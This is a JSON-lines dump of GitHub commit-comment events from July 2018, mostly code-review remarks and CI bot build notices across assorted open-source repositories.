{"id":"7945444225","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29660830,"position":null,"line":null,"path":null,"commit_id":"a7716a3c133d43bf98306c72a5008d2ac5b07fe5","created_at":"2018-07-10T17:57:31Z","updated_at":"2018-07-10T17:57:31Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-43](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-43).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-43-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-10T17:57:31Z"}
{"id":"7945453501","type":"CommitCommentEvent","actor":{"login":"Nemo1369"},"repo":{"name":"BoostCMake/boost_cmake"},"payload":{"comment":{"id":29660842,"position":4,"line":17,"path":".travis.yml","commit_id":"3feeb07a0fffd7d6b2d8c0a76a9ac6004bc97ffd","created_at":"2018-07-10T17:59:18Z","updated_at":"2018-07-10T17:59:18Z","author_association":"MEMBER","body":"Version mismatch"}},"created_at":"2018-07-10T17:59:18Z"}
{"id":"7945454450","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29660847,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T17:59:28Z","updated_at":"2018-07-10T17:59:28Z","author_association":"MEMBER","body":"As a side comment to all this discussion, I'm noting a subtle change in how the compiler conditions are being used, which could lead to confusion.\r\n\r\nIn our original set of conditions, we did not use them to specify the capabilities of the target platform. Rather, they specified what __we__ would support in the particular build. Obviously, the two are related, but they aren't the same.\r\n\r\nFor example, defining `PARALLEL` meant __we__ are supporting parallel execution in this build. It didn't mean that the platform was incapable of supporting it. For a long time we did not support parallel execution under the compact framework. I believe we now do, right @oznetmaster ? In fact, I believe you contributed the changes to make that possible.\r\n\r\nAs another example, `ASYNC` means \"we allow async tests and setup, etc.\" on this platform. That maps fairly precisely to whether the platform supports it, of course, but the difference in meaning is still there.\r\n\r\nWith `THREAD_ABORT` I'm seeing a different pattern. As I understand it, it means that you can abort a thread on the platform. @oznetmaster pointing out that CF can abort but not reset abort, highlights the problem with using conditions for platform capabilities. You may end up with a lot more conditions! I'd rather see something like `USE_ABORT_FOR_TIMEOUT`, which describes what __we__ are doing not what the platform is capable of.\r\n\r\nI think that conditions describing what we do are much clearer and could be used exclusively if it is possible. But if it turns out not to be possible, maybe we can define some format for the names that tells the code reader which it is. The prefix `USE_` as above might serve the purpose or maybe we can think of something else."}},"created_at":"2018-07-10T17:59:28Z"}
{"id":"7945455626","type":"CommitCommentEvent","actor":{"login":"Nemo1369"},"repo":{"name":"BoostCMake/boost_cmake"},"payload":{"comment":{"id":29660850,"position":5,"line":18,"path":".travis.yml","commit_id":"3feeb07a0fffd7d6b2d8c0a76a9ac6004bc97ffd","created_at":"2018-07-10T17:59:41Z","updated_at":"2018-07-10T17:59:41Z","author_association":"MEMBER","body":"Just like here"}},"created_at":"2018-07-10T17:59:41Z"}
{"id":"7945459586","type":"CommitCommentEvent","actor":{"login":"rsoesemann"},"repo":{"name":"Up2Go/cprm-analytics"},"payload":{"comment":{"id":29660861,"position":null,"line":null,"path":null,"commit_id":"a34906b226251aad180042d992d51ed02322c2ec","created_at":"2018-07-10T18:00:22Z","updated_at":"2018-07-10T18:00:22Z","author_association":"COLLABORATOR","body":"1. I think there is duplication and we can remove Customer_Sales_Overview1.*\r\n2. It looks like we are still referencing the unpackaged Status field"}},"created_at":"2018-07-10T18:00:22Z"}
{"id":"7945470104","type":"CommitCommentEvent","actor":{"login":"halbrookmichael"},"repo":{"name":"halbrookmichael/halbrokmichael-github.io"},"payload":{"comment":{"id":29660876,"position":null,"line":null,"path":null,"commit_id":"050ff601a9ef9b0d83364f2fcee0d853535e179e","created_at":"2018-07-10T18:02:16Z","updated_at":"2018-07-10T18:02:16Z","author_association":"OWNER","body":"Update from master"}},"created_at":"2018-07-10T18:02:16Z"}
{"id":"7945472428","type":"CommitCommentEvent","actor":{"login":"ide"},"repo":{"name":"expo/exponent-server-sdk-node"},"payload":{"comment":{"id":29660879,"position":null,"line":null,"path":null,"commit_id":"96b1c6d7fd9ed2732cb31fc3840655bc687e956d","created_at":"2018-07-10T18:02:45Z","updated_at":"2018-07-10T18:02:45Z","author_association":"MEMBER","body":"Yes, this library in v3 is moving to TypeScript and dropping Flow from the bundled type definitions."}},"created_at":"2018-07-10T18:02:45Z"}
{"id":"7945479613","type":"CommitCommentEvent","actor":{"login":"NicoHood"},"repo":{"name":"AmesCornish/buttersink"},"payload":{"comment":{"id":29660893,"position":null,"line":null,"path":null,"commit_id":"4375dfa9ff79595e2ab31f91ffe3ff8437202d99","created_at":"2018-07-10T18:04:13Z","updated_at":"2018-07-10T18:04:13Z","author_association":"NONE","body":"This does not force python2. You must write `python2` in order to use python2. On archlinux this will execute with python3, as it is the default.\r\n\r\n```\r\n$ /usr/bin/env python\r\nPython 3.6.5 (default, May 11 2018, 04:00:52) \r\n[GCC 8.1.0] on linux\r\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\r\n```"}},"created_at":"2018-07-10T18:04:13Z"}
{"id":"7945481338","type":"CommitCommentEvent","actor":{"login":"valtorello"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29660894,"position":null,"line":null,"path":null,"commit_id":"acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db","created_at":"2018-07-10T18:04:34Z","updated_at":"2018-07-10T18:04:34Z","author_association":"NONE","body":"`using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Web;\r\nusing System.Web.Mvc;\r\nusing Vidly.Models;\r\nusing Vidly.ViewModels;\r\nusing System.Data.Entity;\r\n\r\n\r\nnamespace Vidly.Controllers\r\n{\r\n    public class MoviesController : Controller\r\n    {\r\n        private ApplicationDbContext _context;\r\n\r\n        public MoviesController()\r\n        {\r\n            _context = new ApplicationDbContext();\r\n        }\r\n        protected override void Dispose(bool disposing)\r\n        {\r\n            _context.Dispose();\r\n        }\r\n        public ViewResult Index()\r\n        {\r\n            var movies = _context.Movies.Include(m => m.Genre).ToList();\r\n            \r\n\r\n\r\n            return View(movies);\r\n        }\r\n\r\n        public ActionResult Details(int id)\r\n        {\r\n            var movie = _context.Movies.Include(m => m.Genre).SingleOrDefault(m => m.Id == id);\r\n\r\n            if (movie == null)\r\n                return HttpNotFound();\r\n\r\n            return View(movie);\r\n        }\r\n\r\n        /*private IEnumerable<Movie> GetMovies()\r\n        {\r\n            return new List<Movie>\r\n            {\r\n                new Movie { Id = 1, Name = \"Shrek\" },\r\n                new Movie { Id = 2, Name = \"Wall-e\" }\r\n            };\r\n        }*/\r\n\r\n        // GET: Movies/Random\r\n        public ActionResult Random()\r\n        {\r\n            var movie = new Movie() { Name = \"Shrek!\" };\r\n            var customers = new List<Customer>\r\n            {\r\n                new Customer { Name = \"Customer 1\" },\r\n                new Customer { Name = \"Customer 2\" }\r\n            };\r\n\r\n            var viewModel = new RandomMovieViewModel\r\n            {\r\n                Movie = movie,\r\n                Customers = customers\r\n            };\r\n\r\n            return View(viewModel);\r\n        }\r\n    }\r\n}`"}},"created_at":"2018-07-10T18:04:34Z"}
{"id":"7945483999","type":"CommitCommentEvent","actor":{"login":"nfarina"},"repo":{"name":"joshhighet/SiriShortcuts"},"payload":{"comment":{"id":29660902,"position":null,"line":null,"path":null,"commit_id":"d2238703182c48eba2a0491abcfe684cf0076f93","created_at":"2018-07-10T18:05:05Z","updated_at":"2018-07-10T18:05:05Z","author_association":"NONE","body":"😀 "}},"created_at":"2018-07-10T18:05:05Z"}
{"id":"7945485827","type":"CommitCommentEvent","actor":{"login":"halbrookmichael"},"repo":{"name":"halbrookmichael/halbrokmichael-github.io"},"payload":{"comment":{"id":29660908,"position":null,"line":null,"path":null,"commit_id":"050ff601a9ef9b0d83364f2fcee0d853535e179e","created_at":"2018-07-10T18:05:27Z","updated_at":"2018-07-10T18:05:27Z","author_association":"OWNER","body":"update from master 2"}},"created_at":"2018-07-10T18:05:27Z"}
{"id":"7945490162","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29660916,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T18:06:20Z","updated_at":"2018-07-10T18:06:20Z","author_association":"CONTRIBUTOR","body":"Those are good points, and I *think* I already think in these terms. We could support thread abort on all platform builds, but we choose not to. We could support async test methods on all platform builds, but... wait, I'm nearly finished implementing the change so that we do. :D"}},"created_at":"2018-07-10T18:06:20Z"}
{"id":"7945491525","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29660923,"position":null,"line":null,"path":null,"commit_id":"b973408472236e22c754c9e16360320c641e4a40","created_at":"2018-07-10T18:06:38Z","updated_at":"2018-07-10T18:06:38Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.212`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/212) :tada:"}},"created_at":"2018-07-10T18:06:38Z"}
{"id":"7945494597","type":"CommitCommentEvent","actor":{"login":"drotroff"},"repo":{"name":"rstudio/tensorflow"},"payload":{"comment":{"id":29660927,"position":null,"line":null,"path":null,"commit_id":"87af53829c42f45ab2d08dabf10e1ac7538a53e1","created_at":"2018-07-10T18:07:17Z","updated_at":"2018-07-10T18:07:17Z","author_association":"NONE","body":"excellent, thank you!!"}},"created_at":"2018-07-10T18:07:17Z"}
{"id":"7945496090","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29660931,"position":null,"line":null,"path":null,"commit_id":"b973408472236e22c754c9e16360320c641e4a40","created_at":"2018-07-10T18:07:34Z","updated_at":"2018-07-10T18:07:34Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.321`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/402335888) :tada:"}},"created_at":"2018-07-10T18:07:34Z"}
{"id":"7945498362","type":"CommitCommentEvent","actor":{"login":"swarup260"},"repo":{"name":"swarup260/Web-Scraping"},"payload":{"comment":{"id":29660937,"position":null,"line":null,"path":null,"commit_id":"db2e68e5fcef717e9aad556a9c25e2b7f1a7c179","created_at":"2018-07-10T18:08:03Z","updated_at":"2018-07-10T18:08:03Z","author_association":"OWNER","body":"requirement  file"}},"created_at":"2018-07-10T18:08:03Z"}
{"id":"7945500717","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29660942,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T18:08:31Z","updated_at":"2018-07-10T18:08:31Z","author_association":"CONTRIBUTOR","body":"I'd like to get rid of as many conditionals as possible. Also, I introduced `SERIALIZABLE` which isn't an NUnit feature but rather a platform capability, because otherwise we have a perfectly ridiculous amount of thrashing through files whenever we add or remove a .NET Standard build. I've now been involved in manually fixing at least four such thrashes, if I'm counting right."}},"created_at":"2018-07-10T18:08:31Z"}
{"id":"7945501295","type":"CommitCommentEvent","actor":{"login":"anil100391"},"repo":{"name":"Neo-The1/ThinkingTicTacToe"},"payload":{"comment":{"id":29660945,"position":85,"line":127,"path":"monteCarlo.py","commit_id":"a74196ad8fbc3dfc63ffd5e689f050f0249c1c83","created_at":"2018-07-10T18:08:37Z","updated_at":"2018-07-10T18:08:37Z","author_association":"COLLABORATOR","body":"This doesn't look right. As Deepak sir will say let's dry run.\r\nCase 1. player 1 won by making a move on simulation board.\r\n                  so, winner is 1, simulationBoard.otherPlayer() is also 1 So the condition is always true.\r\nCase 2. player 2 won by making a move on simulation board.\r\n                  so, winner is 2, simulationBoard.otherPlayer() is also 2 So the condition is always true.\r\nAny way let me correct it.\r\n"}},"created_at":"2018-07-10T18:08:37Z"}
{"id":"7945502540","type":"CommitCommentEvent","actor":{"login":"eugene-bright"},"repo":{"name":"AmesCornish/buttersink"},"payload":{"comment":{"id":29660952,"position":null,"line":null,"path":null,"commit_id":"4375dfa9ff79595e2ab31f91ffe3ff8437202d99","created_at":"2018-07-10T18:08:52Z","updated_at":"2018-07-10T18:08:52Z","author_association":"COLLABORATOR","body":"Ye, stupid mistake.\r\n`python2` should be invoked of course.\r\nNext time I will send my changes on the code review first.\r\n\r\nThank you for pointing me to this!"}},"created_at":"2018-07-10T18:08:52Z"}
{"id":"7945503294","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29660954,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T18:09:00Z","updated_at":"2018-07-10T18:09:00Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T18:09:00Z"}
{"id":"7945504664","type":"CommitCommentEvent","actor":{"login":"Dharm03"},"repo":{"name":"Dharm03/EthereumTest"},"payload":{"comment":{"id":29660956,"position":null,"line":null,"path":null,"commit_id":"eb2f634a2ba5ed9947443f12b9f25a5a792c932a","created_at":"2018-07-10T18:09:17Z","updated_at":"2018-07-10T18:09:17Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-10T18:09:17Z"}
{"id":"7945506588","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29660961,"position":null,"line":null,"path":null,"commit_id":"3d57b10f480827be55af631675db54e87ed1b12d","created_at":"2018-07-10T18:09:39Z","updated_at":"2018-07-10T18:09:39Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-grid](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-grid).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-grid-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T18:09:39Z"}
{"id":"7945507735","type":"CommitCommentEvent","actor":{"login":"jmcarp"},"repo":{"name":"18F/cg-provision"},"payload":{"comment":{"id":29660965,"position":1,"line":1,"path":"terraform/modules/credhub/elb.tf","commit_id":"28eae0b114c99ed9e718befa6a3167be00e26c47","created_at":"2018-07-10T18:09:52Z","updated_at":"2018-07-10T18:09:52Z","author_association":"MEMBER","body":"Would this put our credhubs on the internet? Why do we need a load balancer here?"}},"created_at":"2018-07-10T18:09:52Z"}
{"id":"7945508286","type":"CommitCommentEvent","actor":{"login":"TambukBinBungul"},"repo":{"name":"TambukBinBungul/programmer"},"payload":{"comment":{"id":29660967,"position":null,"line":null,"path":null,"commit_id":"1b15026b2869e46d103a29e6c73dbe78cdc33b9d","created_at":"2018-07-10T18:09:59Z","updated_at":"2018-07-10T18:09:59Z","author_association":"OWNER","body":"Update terus suatu saat"}},"created_at":"2018-07-10T18:09:59Z"}
{"id":"7945508991","type":"CommitCommentEvent","actor":{"login":"warrenv"},"repo":{"name":"poetapp/explorer-web"},"payload":{"comment":{"id":29660969,"position":31,"line":40,"path":"src/reducers/LoadingPage.test.ts","commit_id":"618543b2b48b59b40075bd6962deea4c1c9cba1a","created_at":"2018-07-10T18:10:08Z","updated_at":"2018-07-10T18:10:08Z","author_association":"MEMBER","body":"These tests are redundant given the first test above that ensures the reducer is initialized properly and the tests below."}},"created_at":"2018-07-10T18:10:08Z"}
{"id":"7945509440","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29660971,"position":2,"line":2,"path":"docs/logs/authorizing-ips-for-syslog.md","commit_id":"4fdf7516344a9d7c77f41b9fc2c2162ba5bb1138","created_at":"2018-07-10T18:10:14Z","updated_at":"2018-07-10T18:10:14Z","author_association":"MEMBER","body":"@goranbajic We don't call Sematext Logs an application.  So here you probably want to say just \r\nSyslog IP authorization details for Sematext Logs Management\r\n"}},"created_at":"2018-07-10T18:10:14Z"}
{"id":"7945510487","type":"CommitCommentEvent","actor":{"login":"cKhoff"},"repo":{"name":"graphql-compose/graphql-compose-mongoose"},"payload":{"comment":{"id":29660972,"position":null,"line":null,"path":null,"commit_id":"86f05c937d98344d03fe8f50039a7b6606fa6755","created_at":"2018-07-10T18:10:25Z","updated_at":"2018-07-10T18:10:25Z","author_association":"NONE","body":"great response time, great guy 👍 "}},"created_at":"2018-07-10T18:10:25Z"}
{"id":"7945512209","type":"CommitCommentEvent","actor":{"login":"NicoHood"},"repo":{"name":"AmesCornish/buttersink"},"payload":{"comment":{"id":29660977,"position":null,"line":null,"path":null,"commit_id":"4375dfa9ff79595e2ab31f91ffe3ff8437202d99","created_at":"2018-07-10T18:10:45Z","updated_at":"2018-07-10T18:10:45Z","author_association":"NONE","body":"Yep, better do code review. It was pure luck, that I randomly looked at the latest commit and spotted the mistake."}},"created_at":"2018-07-10T18:10:45Z"}
{"id":"7945515223","type":"CommitCommentEvent","actor":{"login":"eugene-bright"},"repo":{"name":"AmesCornish/buttersink"},"payload":{"comment":{"id":29660982,"position":null,"line":null,"path":null,"commit_id":"4375dfa9ff79595e2ab31f91ffe3ff8437202d99","created_at":"2018-07-10T18:11:19Z","updated_at":"2018-07-10T18:11:19Z","author_association":"COLLABORATOR","body":"One day my love to force pushing will make me shoot me leg.\r\nFix was force pushed =). Check it please."}},"created_at":"2018-07-10T18:11:19Z"}
{"id":"7945518876","type":"CommitCommentEvent","actor":{"login":"alhajichukxy"},"repo":{"name":"alhajichukxy/betterprograms"},"payload":{"comment":{"id":29660991,"position":null,"line":null,"path":null,"commit_id":"3b89f261cd41035b98cbf91504ab0a96c76d85d8","created_at":"2018-07-10T18:11:57Z","updated_at":"2018-07-10T18:11:57Z","author_association":"OWNER","body":"this is where you share better program codes to help improve the programming community."}},"created_at":"2018-07-10T18:11:57Z"}
{"id":"7945519293","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29660992,"position":17,"line":16,"path":"Lesson 3/Route.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:12:02Z","updated_at":"2018-07-10T18:12:02Z","author_association":"NONE","body":"тогда уже наверное `edge_station?` в единственном числе\r\nты же проверяешь одну станцию на ее \"крайность\" ))"}},"created_at":"2018-07-10T18:12:02Z"}
{"id":"7945520058","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29660994,"position":2,"line":2,"path":"docs/logs/index-events-via-elasticsearch-api.md","commit_id":"ed6482e1093511763e7bcb382107491a0e2ccbb1","created_at":"2018-07-10T18:12:12Z","updated_at":"2018-07-10T18:12:12Z","author_association":"MEMBER","body":"@goranbajic Those other tools are \"log shippers\", so maybe using that phrase as well as \"log libraries like log4j, logback...\" would be good for Goog.  Also, we want to remove \"Plugin\" from \"Fluend Plugin\"."}},"created_at":"2018-07-10T18:12:12Z"}
{"id":"7945522194","type":"CommitCommentEvent","actor":{"login":"warrenv"},"repo":{"name":"poetapp/explorer-web"},"payload":{"comment":{"id":29661001,"position":9,"line":24,"path":"src/reducers/Profile.test.ts","commit_id":"618543b2b48b59b40075bd6962deea4c1c9cba1a","created_at":"2018-07-10T18:12:37Z","updated_at":"2018-07-10T18:12:37Z","author_association":"MEMBER","body":"A better way to test this is to export 'defaultState' from the reducer and use that for expected here instead of createState(). There is a risk for divergence between defaultState and createState()"}},"created_at":"2018-07-10T18:12:37Z"}
{"id":"7945524873","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29661007,"position":null,"line":null,"path":null,"commit_id":"4606344e6ab3039fcf05db81090e020407f7dffc","created_at":"2018-07-10T18:13:10Z","updated_at":"2018-07-10T18:13:10Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#ci-451](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#ci-451).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-451-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-10T18:13:10Z"}
{"id":"7945526033","type":"CommitCommentEvent","actor":{"login":"mbeacom"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29661009,"position":5,"line":230,"path":"app/dashboard/router.py","commit_id":"054f16346f35a6229d4334979c7118b9348637ae","created_at":"2018-07-10T18:13:24Z","updated_at":"2018-07-10T18:13:24Z","author_association":"MEMBER","body":"That's the ideal path, imo.  I thought we would move towards that with the API refactoring we were doing previously, ut it doesn't seem we're using the standard DRF ordering."}},"created_at":"2018-07-10T18:13:24Z"}
{"id":"7945527330","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661012,"position":17,"line":16,"path":"Lesson 3/Route.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:13:40Z","updated_at":"2018-07-10T18:13:40Z","author_association":"NONE","body":"а с учетом использования в отрицательной форме можно сразу назвать `not_edge?(station)` и отрицание использовать в этом методе, чтобы его потом не писать при вызове"}},"created_at":"2018-07-10T18:13:40Z"}
{"id":"7945539447","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661044,"position":42,"line":38,"path":"Lesson 3/Route.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:16:00Z","updated_at":"2018-07-10T18:16:00Z","author_association":"NONE","body":"лучше все же не `elem`, а `station`\r\nты же именно со станциями работаешь здесь"}},"created_at":"2018-07-10T18:16:00Z"}
{"id":"7945539718","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29661045,"position":null,"line":null,"path":null,"commit_id":"2cf520d7039e36d3ffee0c457c9d14c451551234","created_at":"2018-07-10T18:16:02Z","updated_at":"2018-07-10T18:16:02Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-10T18:16:02Z"}
{"id":"7945542306","type":"CommitCommentEvent","actor":{"login":"specialkk"},"repo":{"name":"MistaBibi/Steins-Gate-Discord-Bot"},"payload":{"comment":{"id":29661051,"position":34,"line":34,"path":"src/commands.js","commit_id":"49d07fe64db93f6b792b51ead52362ea74baa47c","created_at":"2018-07-10T18:16:30Z","updated_at":"2018-07-10T18:16:30Z","author_association":"CONTRIBUTOR","body":"This creates is an async race condition that you have accidentally managed to avoid due to the bot requiring an emoji reaction from a human. Plus you don't handle the case where the bot fails to create the role so there are zero guarantees that the role is actually created after this block runs."}},"created_at":"2018-07-10T18:16:30Z"}
{"id":"7945542412","type":"CommitCommentEvent","actor":{"login":"specialkk"},"repo":{"name":"MistaBibi/Steins-Gate-Discord-Bot"},"payload":{"comment":{"id":29661052,"position":40,"line":40,"path":"src/commands.js","commit_id":"49d07fe64db93f6b792b51ead52362ea74baa47c","created_at":"2018-07-10T18:16:31Z","updated_at":"2018-07-10T18:16:31Z","author_association":"CONTRIBUTOR","body":"This can be `const`."}},"created_at":"2018-07-10T18:16:31Z"}
{"id":"7945542537","type":"CommitCommentEvent","actor":{"login":"specialkk"},"repo":{"name":"MistaBibi/Steins-Gate-Discord-Bot"},"payload":{"comment":{"id":29661053,"position":47,"line":47,"path":"src/commands.js","commit_id":"49d07fe64db93f6b792b51ead52362ea74baa47c","created_at":"2018-07-10T18:16:33Z","updated_at":"2018-07-10T18:16:33Z","author_association":"CONTRIBUTOR","body":"This success reply will send regardless if the role was successfully added since you didn't `await` the result of `addRole()`. This also means that you'll get an unhandled rejection error."}},"created_at":"2018-07-10T18:16:33Z"}
{"id":"7945542661","type":"CommitCommentEvent","actor":{"login":"specialkk"},"repo":{"name":"MistaBibi/Steins-Gate-Discord-Bot"},"payload":{"comment":{"id":29661054,"position":49,"line":49,"path":"src/commands.js","commit_id":"49d07fe64db93f6b792b51ead52362ea74baa47c","created_at":"2018-07-10T18:16:34Z","updated_at":"2018-07-10T18:16:34Z","author_association":"CONTRIBUTOR","body":"This also has potential for an unhandled rejection error."}},"created_at":"2018-07-10T18:16:34Z"}
{"id":"7945542840","type":"CommitCommentEvent","actor":{"login":"specialkk"},"repo":{"name":"MistaBibi/Steins-Gate-Discord-Bot"},"payload":{"comment":{"id":29661056,"position":5,"line":16,"path":"src/utils.js","commit_id":"49d07fe64db93f6b792b51ead52362ea74baa47c","created_at":"2018-07-10T18:16:35Z","updated_at":"2018-07-10T18:16:35Z","author_association":"CONTRIBUTOR","body":"I fail to see why this function was necessary? It's a one-line block that just swallows the error that might get thrown when creating a role and provides no indication to the caller if it was successful?"}},"created_at":"2018-07-10T18:16:35Z"}
{"id":"7945544119","type":"CommitCommentEvent","actor":{"login":"xrotwang"},"repo":{"name":"clld/glottolog"},"payload":{"comment":{"id":29661062,"position":null,"line":null,"path":null,"commit_id":"9dd67fdfaaca4b9280629d7119e4fc52fe23d363","created_at":"2018-07-10T18:16:51Z","updated_at":"2018-07-10T18:16:51Z","author_association":"MEMBER","body":"@xflr6 on my new laptop I'm finally on py3! So if you don't expect @d97hah to use `treedb`, you can switch to py3 only :)"}},"created_at":"2018-07-10T18:16:51Z"}
{"id":"7945550272","type":"CommitCommentEvent","actor":{"login":"JohnMH"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29661077,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-10T18:18:01Z","updated_at":"2018-07-10T18:18:01Z","author_association":"OWNER","body":"@IzzySoft It may eventually become true that \"this app will no longer be maintained\" (and may be, in effect, true now), but I have a plan for the order of bug fixes and other things at the moment. However, this project is \"on the backburner\" for now, a secondary priority while I cover issues at work."}},"created_at":"2018-07-10T18:18:01Z"}
{"id":"7945556745","type":"CommitCommentEvent","actor":{"login":"mk1x86"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29661093,"position":null,"line":null,"path":null,"commit_id":"d5ece1204d007b3f646517cb31ce0cc385bcc893","created_at":"2018-07-10T18:19:18Z","updated_at":"2018-07-10T18:19:18Z","author_association":"CONTRIBUTOR","body":"Indeed. Kannst du das encoding ändern? Muss gucken, ob ich heute noch an den pc komme"}},"created_at":"2018-07-10T18:19:18Z"}
{"id":"7945559658","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661104,"position":42,"line":38,"path":"Lesson 3/Route.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:19:52Z","updated_at":"2018-07-10T18:19:52Z","author_association":"NONE","body":"и кстати нет смысла в классе Станция называть аттрибут `station_name`\r\nпросто `name`\r\nу тебя же класс называется `Station`\r\nзначит объек логично назвать `station`\r\nу этого объекта аттрибут `name`\r\nвызов будет `station.name` - просто и понятно\r\nну и в обычной жизни ты же не говоришь \"станции название этой станции\"... просто \"название этой станции\""}},"created_at":"2018-07-10T18:19:52Z"}
{"id":"7945564384","type":"CommitCommentEvent","actor":{"login":"SamAsEnd"},"repo":{"name":"Yididya/amharic_spell_corrector"},"payload":{"comment":{"id":29661112,"position":null,"line":null,"path":null,"commit_id":"6eb84ef5919302e2aab5291e0b236229324fdd57","created_at":"2018-07-10T18:20:51Z","updated_at":"2018-07-10T18:20:51Z","author_association":"NONE","body":"Awesome project :+1: "}},"created_at":"2018-07-10T18:20:51Z"}
